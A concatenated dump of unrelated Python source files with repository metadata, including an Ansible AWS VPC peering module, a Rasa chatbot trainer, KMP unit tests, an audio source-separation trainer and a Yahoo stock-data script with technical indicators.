"cidr_block": "172.31.0.0/16"
},
"vpc_peering_connection_id": "pcx-12345678",
"requester_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "10.100.0.0/16"
}
}
]
Return:
Tuple (bool, bool, str, dict)
"""
changed = False
success, err_msg, results = (
describe_peering_connections(
client, vpc_peering_id=vpc_peering_id,
status_codes=['pending-acceptance', 'active'],
check_mode=check_mode
)
)
params = {
'VpcPeeringConnectionId': vpc_peering_id,
'DryRun': check_mode,
}
if success and results:
results = convert_to_lower(results[0])
err_msg = (
'Can not {0} on a {1} state: peer: {2}'
.format(state, results['status']['code'], vpc_peering_id)
)
if is_pending(results):
if state == 'accept' or state == 'absent' or state == 'reject':
success, changed, err_msg, results = (
runner(client, state, params)
)
elif is_active(results):
if state == 'absent':
success, changed, err_msg, results = (
runner(client, state, params)
)
elif len(results) == 0:
success = False
err_msg = (
'Can not {0} a peer does not exist: {1}-{2}'
.format(state, err_msg, vpc_peering_id)
)
return success, changed, err_msg, convert_to_lower(results)
def accept(client, vpc_peering_id, check_mode=False):
"""Wrapper function that calls run with the proper state and returns
the exact signature of the run function.
Args:
client (botocore.client.EC2): Boto3 client.
vpc_peering_id (str): The vpc peering connection id.
Kwargs:
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
"""
success, changed, err_msg, _ = (
run(client, vpc_peering_id, 'accept', check_mode=check_mode)
)
return success, changed, err_msg, {}
def reject(client, vpc_peering_id, check_mode=False):
"""Wrapper function that calls run with the proper state and returns
the exact signature of the run function.
Args:
client (botocore.client.EC2): Boto3 client.
vpc_peering_id (str): The vpc peering connection id.
Kwargs:
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
"""
success, changed, err_msg, _ = (
run(client, vpc_peering_id, 'reject', check_mode=check_mode)
)
return success, changed, err_msg, {}
def delete(client, vpc_peering_id, check_mode=False):
"""Wrapper function that calls run with the proper state and returns
the exact signature of the run function.
Args:
client (botocore.client.EC2): Boto3 client.
vpc_peering_id (str): The vpc peering connection id.
Kwargs:
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
"""
success, changed, err_msg, _ = (
run(client, vpc_peering_id, 'absent', check_mode=check_mode)
)
return success, changed, err_msg, {}
def update(client, vpc_peering_id, tags, accept_peer=False,
accept_with_profile=None, region=None,
accepter_routes=None, requester_routes=None, check_mode=False):
"""Add Tags to a VPC Peering Connection and or Accept the peer.
Args:
client (botocore.client.EC2): Boto3 client.
vpc_peering_id (str): The vpc peering connection id.
tags (list): List of dictionaries.
examples.. [{Name: "", Values: [""]}]
Kwargs:
accept_peer (bool): if set to True, the peer will be accepted.
accept_with_profile (str): Boto3 Profile to use with accept.
region (str): if accept_with_profile is passed, than this region
also needs to be passed.
default=None
accepter_routes (list): list of route table ids that you want
to add routes to the cidr that belongs to the peer of the newly
created peering_connection
default=None
requester_routes (list): list of route table ids that you want
to add routes to the cidr that belongs to the vpc that is
initiating the creation of the newly created peering_connection
default=None
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> vpc_peering_id = 'pcx-12345'
>>> tags = [{'Name': 'Service', 'Values': ['Development']}]
>>> accept_peer = True
>>> update(client, vpc_peering_id, tags, accept_peer)
[
True,
True,
"",
{
"status": {
"message": "Active",
"code": "active"
},
"tags": [
{
"value": "web",
"key": "service"
},
{
"value": "Shaolin Allen",
"key": "Name"
},
{
"value": "development",
"key": "env"
}
],
"accepter_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "172.31.0.0/16"
},
"vpc_peering_connection_id": "pcx-12345678",
"requester_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "10.100.0.0/16"
}
}
]
Return:
Tuple (bool, bool, str, dict)
"""
success = False
changed = False
err_msg = ""
result = dict()
success, err_msg, results = (
describe_peering_connections(
client, vpc_peering_id=vpc_peering_id,
status_codes=['active', 'pending-acceptance', 'initiating-request'],
check_mode=check_mode
)
)
if results:
peer_info = convert_to_lower(results[0])
tag_update_success, tag_err_msg = (
update_tags(
client, vpc_peering_id, tags, check_mode=check_mode
)
)
if tag_update_success:
if (is_active(peer_info) or is_pending(peer_info)
or is_initiating_request(peer_info)):
vpc_peering_id = peer_info['vpc_peering_connection_id']
changed = True
status_codes = ['pending-acceptance']
original_client = client
if accept_peer:
if accept_with_profile:
###Switch client to use boto3 profile
accept_client, err_msg = (
create_client_with_profile(
accept_with_profile, region
)
)
if err_msg:
success = False
else:
client = accept_client
if success:
success, changed, err_msg, results = (
accept(
client, vpc_peering_id, check_mode=check_mode
)
)
status_codes.append('active')
if success:
###Update tags for peered connection, using the boto3 profile
success, err_msg = (
update_tags(
client, vpc_peering_id, tags,
check_mode=check_mode
)
)
_, _, result = (
describe_peering_connections(
client, vpc_peering_id=vpc_peering_id,
status_codes=status_codes, check_mode=check_mode
)
)
if result and success:
result = convert_to_lower(result[0])
if (accepter_routes and not accept_with_profile or
requester_routes):
client = original_client
if accepter_routes or requester_routes:
success, changed, _ = (
pre_update_routes(
client, result, accepter_routes,
requester_routes, check_mode
)
)
return success, changed, err_msg, result
def create(client, vpc_id, vpc_peer_id, tags, peer_owner_id=None,
accept_peer=False, accept_with_profile=None, region=None,
accepter_routes=None, requester_routes=None, check_mode=False):
"""Create a local and cross account vpc peering connection
Args:
client (botocore.client.EC2): Boto3 client.
vpc_id (str): The requestor vpc_id.
vpc_peer_id (str): The accepter vpc_id.
tags (list): List of dictionaries containing the tags you would like to
add or update in this peer.
Kwargs:
peer_owner_id (str): The AWS Account you want to peer against.
default=None
accept_peer (bool): if set to True, the peer will be accepted.
default=False (Peer will only be accepted if it is in the same AWS account)
accept_with_profile (str): The name of the profile that you have set in your
~/.aws/credentials profile.
region (str): The aws region you want to connect to.
accepter_routes (list): list of route table ids that you want
to add routes to the cidr that belongs to the peer of the newly
created peering_connection
default=None
requester_routes (list): list of route table ids that you want
to add routes to the cidr that belongs to the vpc that is
initiating the creation of the newly created peering_connection
default=None
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> vpc_id = 'vpc-1234567'
>>> vpc_peer_id = 'vpc-7654321'
>>> tags = [{'Name': 'Service', 'Values': ['Development']}]
>>> create(client, vpc_id, vpc_peer_id, tags, accept_peer=True)
[
True,
True,
"",
{
"status": {
"message": "Active",
"code": "active"
},
"tags": [
{
"value": "web",
"key": "service"
},
{
"value": "Shaolin Allen",
"key": "Name"
},
{
"value": "development",
"key": "env"
}
],
"accepter_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "172.31.0.0/16"
},
"vpc_peering_connection_id": "pcx-12345678",
"requester_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "10.100.0.0/16"
}
}
]
Return:
Tuple (bool, bool, str, dict)
"""
runit = False
updateit = False
changed = False
success = False
err_msg = ''
results = dict()
params = {
'VpcId': vpc_id,
'PeerVpcId': vpc_peer_id,
'DryRun': check_mode
}
if peer_owner_id:
params['PeerOwnerId'] = peer_owner_id
success, err_msg, results = (
describe_peering_connections(
client, params['VpcId'], params['PeerVpcId'],
status_codes=['active']
)
)
if results:
updateit = True
else:
runit = True
if runit:
success, changed, err_msg, results = (
runner(client, 'present', params)
)
if success and changed:
updateit = True
if updateit:
if isinstance(results, list):
results = convert_to_lower(results[0])
vpc_peering_id = results['vpc_peering_connection_id']
success, changed, err_msg, results = (
update(
client, vpc_peering_id, tags, accept_peer,
accept_with_profile, region, accepter_routes,
requester_routes, check_mode
)
)
if success:
err_msg = ''
results = convert_to_lower(results)
if results.get('tags', None):
results['tags'] = convert_list_of_tags(results['tags'])
return success, changed, err_msg, results
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
accepter_routes=dict(type='list'),
requester_routes=dict(type='list'),
vpc_id=dict(),
vpc_peer_id=dict(),
vpc_peering_id=dict(),
peer_owner_id=dict(),
accept_peer=dict(type='bool', default=False),
profile=dict(),
accept_with_profile=dict(),
resource_tags=dict(type='dict'),
state=dict(
default='present', choices=[
'present', 'absent', 'accept', 'reject'
]
)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required.')
check_mode = module.check_mode
accept_with_profile = module.params.get('accept_with_profile')
accepter_routes = module.params.get('accepter_routes')
requester_routes = module.params.get('requester_routes')
boto_profile = module.params.get('profile')
vpc_id = module.params.get('vpc_id')
vpc_peer_id = module.params.get('vpc_peer_id')
vpc_peering_id = module.params.get('vpc_peering_id')
peer_owner_id = module.params.get('peer_owner_id')
accept_peer = module.params.get('accept_peer')
tags = module.params.get('resource_tags')
state = module.params.get('state').lower()
if tags:
tags = make_tags_in_aws_format(tags)
if state == 'present' and not tags:
err_msg = "parameters state=present and tags are required together"
module.fail_json(
success=False, changed=False, result={}, msg=err_msg
)
if accept_with_profile and state == 'present' and not accept_peer:
err_msg = "accept_with_profile can only be used with accept_peer"
module.fail_json(
success=False, changed=False, result={}, msg=err_msg
)
try:
region, ec2_url, aws_connect_kwargs = (
get_aws_connection_info(module, boto3=True)
)
client = (
boto3_conn(
module, conn_type='client', resource='ec2',
region=region, endpoint=ec2_url, **aws_connect_kwargs
)
)
except botocore.exceptions.ClientError, e:
err_msg = 'Boto3 Client Error - {0}'.format(str(e.msg))
module.fail_json(
success=False, changed=False, result={}, msg=err_msg
)
if boto_profile:
client, err_msg = create_client_with_profile(boto_profile, region)
if err_msg:
module.fail_json(
success=False, changed=False, result={}, msg=err_msg
)
if state == 'accept':
success, changed, err_msg, results = (
accept(client, vpc_peering_id, check_mode=check_mode)
)
if success and changed:
err_msg = (
'Peering connection {0} accepted.'
.format(vpc_peering_id)
)
elif state == 'present':
success, changed, err_msg, results = (
create(
client, vpc_id, vpc_peer_id, peer_owner_id=peer_owner_id,
tags=tags, accept_peer=accept_peer,
accept_with_profile=accept_with_profile,
accepter_routes=accepter_routes,
requester_routes=requester_routes, check_mode=check_mode,
region=region
)
)
if success and changed:
vpc_peering_id = results['vpc_peering_connection_id']
status_code = results['status']['code']
err_msg = (
'peering connection {0} created. Current status is {1}.'
.format(vpc_peering_id, status_code)
)
elif state == 'reject':
success, changed, err_msg, results = (
reject(client, vpc_peering_id, check_mode=check_mode)
)
if success and changed:
err_msg = 'Peering connection {0} rejected.'.format(vpc_peering_id)
elif state == 'absent':
success, changed, err_msg, results = (
delete(client, vpc_peering_id, check_mode=check_mode)
)
if success and changed:
err_msg = 'Peering connection {0} deleted.'.format(vpc_peering_id)
if success:
module.exit_json(
success=success, changed=changed, msg=err_msg, **results
)
else:
module.fail_json(
success=success, changed=changed, msg=err_msg, result=results
)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
[
"asanabria@linuxdynasty.org"
] |
asanabria@linuxdynasty.org
|
5c103efa039afb5675e58e1d72848406ed515778
|
e5f48d7ffdb830d6a4cb723f0dc5c200225dcb4a
|
/train_init.py
|
f329d0e44fc9cb3c8a23da70db75405843d177ae
|
[] |
no_license
|
poornimaarunp/Foodie_bot
|
5dfaf33c194b069a1e9ca2a3c3a5d4455a2667d5
|
b2694c64e0c7d7cadf2b4f99c6aa2ea670f538dd
|
refs/heads/master
| 2020-04-14T17:04:17.981562
| 2019-01-12T19:39:18
| 2019-01-12T19:39:18
| 163,969,285
| 0
| 5
| null | 2019-01-12T19:39:19
| 2019-01-03T12:19:26
|
Python
|
UTF-8
|
Python
| false
| false
| 952
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import logging
from rasa_core.agent import Agent
from rasa_core.policies.keras_policy import KerasPolicy
from rasa_core.policies.memoization import MemoizationPolicy
from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer, BinarySingleStateFeaturizer)
import warnings
warnings.filterwarnings("ignore")
if __name__ == '__main__':
logging.basicConfig(level='INFO')
training_data_file = './data/stories.md'
model_path = './models/dialogue'
featurizer = MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=5)
agent = Agent('restaurant_domain.yml', policies = [MemoizationPolicy(max_history = 4), KerasPolicy(featurizer)])
agent.train(
training_data_file,
augmentation_factor = 50,
#max_history = 4,
epochs = 500,
batch_size = 30,
validation_split = 0.2)
agent.persist(model_path)
|
[
"poornimadevi_pandurangan@intuit.com"
] |
poornimadevi_pandurangan@intuit.com
|
4cdb15c5e29b3981667bd910b1ec91ca2e02c3d0
|
498248ed6d299d99d5bf4c8f6f5e5b30f9c3830f
|
/strings/kmp_test.py
|
e2a510b86174d22c2b56e029796d055ace04bb7d
|
[
"MIT"
] |
permissive
|
tacores/algo-box-py
|
23d21d453146426d22117c5eb32fa733d9a2a6a4
|
a7c0ee6dcdd1cdcb79062f2c275e00dbb2db35cc
|
refs/heads/master
| 2022-12-07T05:33:50.645550
| 2022-11-25T05:25:22
| 2022-11-25T05:25:22
| 47,456,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
from kmp import find_pattern
from kmp import compute_prefix_function
import unittest
class kmp_test(unittest.TestCase):
def test_sample1(self):
pattern = 'TACG'
text = 'GT'
expected = []
self.assertEqual(find_pattern(pattern, text), expected)
def test_sample2(self):
pattern = 'ATA'
text = 'ATATA'
expected = [0, 2]
self.assertEqual(find_pattern(pattern, text), expected)
def test_sample3(self):
pattern = 'ATAT'
text = 'GATATATGCATATACTT'
expected = [1, 3, 9]
self.assertEqual(find_pattern(pattern, text), expected)
def test_compute_prefix_function1(self):
param = 'abababcaab'
expected = [0, 0, 1, 2, 3, 4, 0, 1, 1, 2]
self.assertEqual(compute_prefix_function(param), expected)
if __name__ == '__main__':
unittest.main()
|
[
"buttix@gmail.com"
] |
buttix@gmail.com
|
583649e90ac9a7a34d488bf599da060220579864
|
aaa44fed6e0ccb7072f39e77aac73d94dca5616d
|
/paas/wsgi.py
|
effee3dd6f45fc692edf8ead26b88dba10256889
|
[] |
no_license
|
heidsoft/open_paas
|
d37a525554ab49002508dffcdad65575d8f2ced4
|
42ae862b7460efa05b8f1a6d0503933091b7d5de
|
refs/heads/master
| 2021-01-25T04:59:24.969189
| 2017-06-06T09:28:09
| 2017-06-06T09:28:09
| 93,500,133
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 547
|
py
|
"""
WSGI config for paas project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
from gevent import monkey
# patches stdlib (including socket and ssl modules) to cooperate with other greenlets
monkey.patch_all()
import os
from django.core.wsgi import get_wsgi_application
from dj_static import Cling
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
application = Cling(get_wsgi_application())
|
[
"heidsoft@sina.com"
] |
heidsoft@sina.com
|
82a2f1e425e03421f482e49454ad009e38420e6b
|
9300f0f196d598204be5392e4461551d45654bb2
|
/Programmers/Level1/collatz-conjecture.py
|
8924ea26dfbc2603a9c7d6491b5c650a4e24d456
|
[] |
no_license
|
coding-Benny/algorithm-interview
|
dfcb6d85e300a9d786d571b9b5d28f86392555a2
|
3a1bda5a6b3dee892dba70f1f4e9aa13d1cfd510
|
refs/heads/master
| 2023-08-18T01:58:26.198842
| 2021-10-02T01:39:07
| 2021-10-02T01:39:07
| 281,088,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 447
|
py
|
# https://programmers.co.kr/learn/courses/30/lessons/12943
def solution(num: int) -> int:
count = 0
while num != 1:
if num % 2 == 0:
num //= 2
else:
num = num * 3 + 1
count += 1
if count == 500:
return -1
return count
if __name__ == '__main__':
res = solution(6)
print(res)
res = solution(16)
print(res)
res = solution(626331)
print(res)
|
[
"noreply@github.com"
] |
coding-Benny.noreply@github.com
|
7c6cd5caddd898e5f3b193ec9e80d834777cb21f
|
a0c69a70c7b8337ead0aed583e494156dc342501
|
/pop.py
|
9cbdad1e6d41a077feec6ef9d9110813c39c254a
|
[] |
no_license
|
tashadanner/python-practice
|
d0811ec8f3ff5449ae64a6bba314ddb3ee52a278
|
7827aa99389d8a067928f151fbf2425b5ba3324f
|
refs/heads/main
| 2023-03-11T21:50:22.426803
| 2021-02-24T00:57:44
| 2021-02-24T00:57:44
| 340,515,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 817
|
py
|
city_name = "Instabul, Turkey"
pop_1927 = 691000
pop_2017 = 15029231
pop_1950 = 983000
pop_2000 = 8831800
pop_change = pop_2017 - pop_1927
percentage_gr = (pop_change/pop_1927) * 100
annual_gr = percentage_gr/(2017-1927)
def population_growth(year_one,year_two,population_one,population_two):
pop_change = population_two - population_one
percentage_gr = (pop_change/population_one) * 100
growth_rate = percentage_gr/(year_two - year_one)
return growth_rate
print(annual_gr)
set_one = population_growth(1927,2017,pop_1927,pop_2017)
print(set_one)
set_two = population_growth(1950,2000,pop_1950,pop_2000)
print(set_two)
report = f"The population of Istanbul grew from {pop_1927} to {pop_2017} for a total growth of {pop_change}. The annual growth rate during that time was {annual_gr}%."
print(report)
|
[
"tashalouisedanner@gmail.com"
] |
tashalouisedanner@gmail.com
|
3fe58f00ee2864c8d10f6843a6e31f920996f4c9
|
24a493bafc44dd081f79a728dcb4212a66cb7947
|
/src/main.py
|
a235d2f6f74d0a9de63e49dc3190c68857edeea2
|
[
"MIT"
] |
permissive
|
mori97/MVAE
|
b23c760c2e63346a75a37b208cd2e1db93c80535
|
fb8a705fd2a414554ecf760054a86bf50f305c8e
|
refs/heads/master
| 2023-03-03T15:45:14.324149
| 2021-02-12T04:07:37
| 2021-02-12T04:07:37
| 205,518,408
| 2
| 1
|
MIT
| 2019-10-08T08:24:31
| 2019-08-31T08:36:13
|
Python
|
UTF-8
|
Python
| false
| false
| 9,542
|
py
|
import argparse
import os
import re
import statistics as stat
try:
import cupy as cp
except ImportError:
cp = None
import librosa
import matplotlib.pyplot as plt
import mir_eval
import numpy as np
import torch
from torch.nn.utils import clip_grad_norm_
import torch.utils.data
from torch.utils.tensorboard import SummaryWriter
from torchaudio.functional import istft
from common import to_tensor
from cvae import CVAE, lossfun
from ilrma import ilrma
from make_dataset import N_FFT, HOP_LEN
from mvae import mvae
def train(model, data_loader, optimizer, device, epoch, writer):
model.train()
total_loss = 0
for x, c in data_loader:
x, c = x.to(device), c.to(device)
log_sigma_sq, mu, logvar = model(x, c)
loss = lossfun(x, log_sigma_sq, mu, logvar)
total_loss += loss.item()
optimizer.zero_grad()
loss.backward()
clip_grad_norm_(model.parameters(), 2)
optimizer.step()
writer.add_scalar('Loss/train', total_loss / len(data_loader), epoch)
def validate(model, val_dataset, baseline, device, epoch, writer):
model.eval()
if_use_cuda = device != torch.device('cpu')
xp = cp if if_use_cuda else np
window = torch.hann_window(N_FFT).to(device)
result = {'SDR': {}, 'SIR': {}, 'SAR': {}}
for i, (src, mix_spec, speaker) in enumerate(val_dataset):
if if_use_cuda:
mix_spec = cp.asarray(mix_spec)
separated, _ = mvae(mix_spec, model, n_iter=40, device=device)
separated = separated.transpose(1, 0, 2)
# Convert to PyTorch-style complex tensor (Shape = (..., 2))
separated = xp.stack((xp.real(separated), xp.imag(separated)), axis=-1)
if if_use_cuda:
separated = to_tensor(separated)
else:
separated = torch.from_numpy(separated)
with torch.no_grad():
separated = istft(separated, N_FFT, HOP_LEN, window=window)
separated = separated.cpu().numpy()
sdr, sir, sar, _ =\
mir_eval.separation.bss_eval_sources(src, separated)
if speaker in result['SDR']:
result['SDR'][speaker].extend(sdr.tolist())
result['SIR'][speaker].extend(sir.tolist())
result['SAR'][speaker].extend(sar.tolist())
else:
result['SDR'][speaker] = []
result['SIR'][speaker] = []
result['SAR'][speaker] = []
sep_tensor0 = torch.from_numpy(separated[0, :]).unsqueeze(0)
sep_tensor1 = torch.from_numpy(separated[1, :]).unsqueeze(0)
writer.add_audio('eval/{}_0'.format(i), sep_tensor0, epoch, 16000)
writer.add_audio('eval/{}_1'.format(i), sep_tensor1, epoch, 16000)
for metric in result:
for speaker in result[metric]:
result[metric][speaker] = (stat.mean(result[metric][speaker]),
stat.stdev(result[metric][speaker]))
figures = bar_chart(baseline, result)
for metric, figure in figures.items():
writer.add_figure(f'eval/{metric}', figure, epoch)
def bar_chart(baseline, result):
ret = {}
speakers = list(result['SDR'].keys())
speakers.sort()
x = np.arange(len(speakers))
width = 0.4
for metric in result:
baseline_mean = [baseline[metric][speaker][0] for speaker in speakers]
baseline_stdv = [baseline[metric][speaker][1] for speaker in speakers]
result_mean = [result[metric][speaker][0] for speaker in speakers]
result_stdv = [result[metric][speaker][1] for speaker in speakers]
figure, ax = plt.subplots()
ax.bar(x - width / 2, baseline_mean, width,
yerr=baseline_stdv, label='Baseline')
ax.bar(x + width / 2, result_mean, width,
yerr=result_stdv, label='MVAE')
ax.set_title(metric)
ax.set_xticks(x)
ax.set_xticklabels(speakers)
ax.legend()
ret[metric] = figure
return ret
def baseline_ilrma(val_dataset, device):
"""Evaluate with ILRMA.
"""
if_use_cuda = device != torch.device('cpu')
xp = cp if if_use_cuda else np
window = torch.hann_window(N_FFT).to(device)
ret = {'SDR': {}, 'SIR': {}, 'SAR': {}}
for src, mix_spec, speaker in val_dataset:
if if_use_cuda:
mix_spec = cp.asarray(mix_spec)
separated, _ = ilrma(mix_spec, n_iter=100)
separated = separated.transpose(1, 0, 2)
# Convert to PyTorch-style complex tensor (Shape = (..., 2))
separated = xp.stack((xp.real(separated), xp.imag(separated)), axis=-1)
if if_use_cuda:
separated = to_tensor(separated)
else:
separated = torch.from_numpy(separated)
with torch.no_grad():
separated = istft(separated, N_FFT, HOP_LEN, window=window)
separated = separated.cpu().numpy()
sdr, sir, sar, _ =\
mir_eval.separation.bss_eval_sources(src, separated)
if speaker in ret['SDR']:
ret['SDR'][speaker].extend(sdr.tolist())
ret['SIR'][speaker].extend(sir.tolist())
ret['SAR'][speaker].extend(sar.tolist())
else:
ret['SDR'][speaker] = []
ret['SIR'][speaker] = []
ret['SAR'][speaker] = []
for metric in ret:
for speaker in ret[metric]:
ret[metric][speaker] = (stat.mean(ret[metric][speaker]),
stat.stdev(ret[metric][speaker]))
return ret
def make_eval_set(path):
"""Make the evaluation dataset.
"""
src_wav_files = [x for x in os.listdir(path) if x.endswith('_src.wav')]
ptn = r'(?P<speaker0>[A-Z]{2}\d)(?P<num0>\d\d)_' \
r'(?P<speaker1>[A-Z]{2}\d)(?P<num1>\d\d)_src\.wav$'
prog = re.compile(ptn)
def zero_pad(x):
if (x.shape[1] + HOP_LEN) % (4 * HOP_LEN) == 0:
return x
rest = 4 * HOP_LEN - (x.shape[1] + HOP_LEN) % (4 * HOP_LEN)
left = rest // 2
right = rest - left
return np.pad(x, ((0, 0), (left, right)), mode='constant')
dataset = []
for src_wav_file in src_wav_files:
result = prog.match(src_wav_file)
speaker0, file_num0 = result.group('speaker0'), result.group('num0')
speaker1, file_num1 = result.group('speaker1'), result.group('num1')
mix_wav_file = f'{speaker0}{file_num0}_{speaker1}{file_num1}_mix.wav'
src_wav_path = os.path.join(path, src_wav_file)
mix_wav_path = os.path.join(path, mix_wav_file)
src, _ = librosa.load(src_wav_path, sr=16000, mono=False)
mix, _ = librosa.load(mix_wav_path, sr=16000, mono=False)
src, mix = zero_pad(src), zero_pad(mix)
mix_spec = np.stack(
[librosa.stft(np.asfortranarray(x), N_FFT, HOP_LEN) for x in mix],
axis=1)
dataset.append((src, mix_spec, f'{speaker0}-{speaker1}'))
return dataset
def main():
parser = argparse.ArgumentParser(
description='Train MVAE with VCC2018 dataset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--train-dataset',
help='Path of training dataset.',
type=str, required=True)
parser.add_argument('--val-dataset',
help='Path of validation dataset.',
type=str, required=True)
parser.add_argument('--batch-size', '-b',
help='Batch size.',
type=int, default=32)
parser.add_argument('--epochs', '-e',
help='Number of epochs.',
type=int, default=800)
parser.add_argument('--eval-interval',
help='Evaluate and save model every N epochs.',
type=int, default=200, metavar='N')
parser.add_argument('--gpu', '-g',
help='GPU id. (Negative number indicates CPU)',
type=int, default=-1)
parser.add_argument('--learning-rate', '-l',
help='Learning Rate.',
type=float, default=1e-3)
parser.add_argument('--output',
help='Save model to PATH',
type=str, default='./models')
args = parser.parse_args()
if not os.path.isdir(args.output):
os.mkdir(args.output)
if_use_cuda = torch.cuda.is_available() and args.gpu >= 0
if if_use_cuda:
device = torch.device(f'cuda:{args.gpu}')
cp.cuda.Device(args.gpu).use()
else:
device = torch.device('cpu')
train_dataset = torch.load(args.train_dataset)
train_dataloader = torch.utils.data.DataLoader(
train_dataset, args.batch_size, shuffle=True)
val_dataset = make_eval_set(args.val_dataset)
baseline = baseline_ilrma(val_dataset, device)
model = CVAE(n_speakers=train_dataset[0][1].size(0)).to(device)
optimizer = torch.optim.Adam(model.parameters(), args.learning_rate)
# TensorBoard
writer = SummaryWriter()
for epoch in range(1, args.epochs + 1):
train(model, train_dataloader, optimizer, device, epoch, writer)
if epoch % args.eval_interval == 0:
validate(model, val_dataset, baseline, device, epoch, writer)
# Save model
model.cpu()
path = os.path.join(args.output, f'model-{epoch}.pth')
torch.save(model.state_dict(), path)
model.to(device)
writer.close()
if __name__ == '__main__':
main()
|
[
"du@sap.ist.i.kyoto-u.ac.jp"
] |
du@sap.ist.i.kyoto-u.ac.jp
|
1ee80c958f20bd0cbdd8dd31c7aec4d8e5bb6ce6
|
a88f4151ffb6d06621970a517f31a80c8f35cbf7
|
/data_prepare.py
|
3ae070e9c2d6dbf1b7cb2a7bd73e89a001f26408
|
[] |
no_license
|
indiejoseph/nn_trading
|
74d6302fae632cf95679254a8f45c972dd7773d0
|
cce81b458f2c1947c7c58d7513ac155e881f5666
|
refs/heads/master
| 2021-01-21T16:39:27.371523
| 2016-01-04T16:09:59
| 2016-01-04T16:09:59
| 47,880,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,777
|
py
|
__author__ = 'Joseph Cheng <indiejoseph@gmail.com>'
__version__ = '0.1'
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
import urllib2
import os
import numpy as np
import sys
import codecs
from datetime import date, datetime
import matplotlib.pyplot as plt
# Yahoo Historical
YAHOO_HISTORICAL_URL = 'http://ichart.yahoo.com/table.csv'
class YahooHistorical(object):
def __init__(self, data_from=None, data_to=None):
self.data_from = data_from
self.data_to = data_to
def open(self, file):
with codecs.open(file, 'r', encoding='utf8') as f:
csv = f.read()
return self._parse(csv)
def download(self, symbol):
dest_file = symbol + '.csv'
dest_file = os.path.join(os.path.dirname(__file__), 'data', dest_file)
query = urlencode({
's': symbol,
'g': 'd',
'ignore': '.csv'
})
response = urllib2.urlopen(YAHOO_HISTORICAL_URL + '?' + query).read()
lines = str(response).split('\n')
fx = open(dest_file, 'w')
for line in lines[1:-1]:
fx.write(line + '\n')
fx.close()
return self._parse(response)
def get(self):
return self.data
def trading_range_breakout(self, n):
prices = [row['adj_close'] for row in self.data]
tmax = np.zeros(len(prices))
tmin = np.zeros(len(prices))
for idx, price in enumerate(prices):
p = np.append(prices[idx-n:idx+1], price)
tmax[idx] = np.max(p)
tmin[idx] = np.min(p)
return (tmax, tmin)
def relative_strength(self, n=14):
"""
compute the n period relative strength indicator
http://stockcharts.com/school/doku.php?id=chart_school:glossary_r#relativestrengthindex
http://www.investopedia.com/terms/r/rsi.asp
"""
prices = [row['adj_close'] for row in self.data]
deltas = np.diff(prices)
seed = deltas[:n+1]
up = seed[seed >= 0].sum()/n
down = -seed[seed < 0].sum()/n
rs = up/down
rsi = np.zeros_like(prices)
rsi[:n] = 100. - 100./(1. + rs)
for i in range(n, len(prices)):
delta = deltas[i - 1] # cause the diff is 1 shorter
if delta > 0:
upval = delta
downval = 0.
else:
upval = 0.
downval = -delta
up = (up*(n - 1) + upval)/n
down = (down*(n - 1) + downval)/n
rs = up/down
rsi[i] = 100. - 100./(1. + rs)
return rsi
def moving_average(self, n, type='simple'):
"""
compute an n period moving average.
type is 'simple' | 'exponential'
"""
prices = [row['adj_close'] for row in self.data]
if type == 'simple':
weights = np.ones(n)
else:
weights = np.exp(np.linspace(-1., 0., n))
weights /= weights.sum()
a = np.convolve(prices, weights, mode='full')[:len(prices)]
a[:n] = a[n]
return a
def moving_average_convergence(self, nslow=26, nfast=12):
"""
compute the MACD (Moving Average Convergence/Divergence) using a fast and slow exponential moving avg'
return value is emaslow, emafast, macd which are len(x) arrays
"""
emaslow = self.moving_average(nslow, type='exponential')
emafast = self.moving_average(nfast, type='exponential')
return emaslow, emafast, emafast - emaslow
def _parse(self, data):
self.data = []
lines = str(data).split('\n')
for line in lines[1:-1][::-1]:
(date, open, high, low, close, vol, adj_close) = line.split(',')
date = datetime.strptime(date, '%Y-%m-%d').date()
self.data.append({
'date': date,
'open': float(open),
'high': float(high),
'low': float(low),
'close': float(close),
'vol': float(vol),
'adj_close': float(adj_close)
})
if self.data_from != None:
self.data = [row for row in self.data if row['date'] >= self.data_from]
if self.data_to != None:
self.data = [row for row in self.data if row['date'] <= self.data_to]
return self.data
if __name__ == '__main__':
# get historica csv file from last month
s = '^HSI'
dest_file = s + '.csv'
dest_file = os.path.join(os.path.dirname(__file__), 'data', dest_file)
t = date(2015, 12, 9)
f = date(2015, 1, 4)
h = YahooHistorical(f, t)
h.download(s)
# h.open(dest_file)
y = h.get()
x = [row['date'] for row in y]
sma20 = h.moving_average(20, type='simple') # 20 day moving average
sma200 = h.moving_average(200, type='simple') # 200 day moving average
rsi = h.relative_strength()
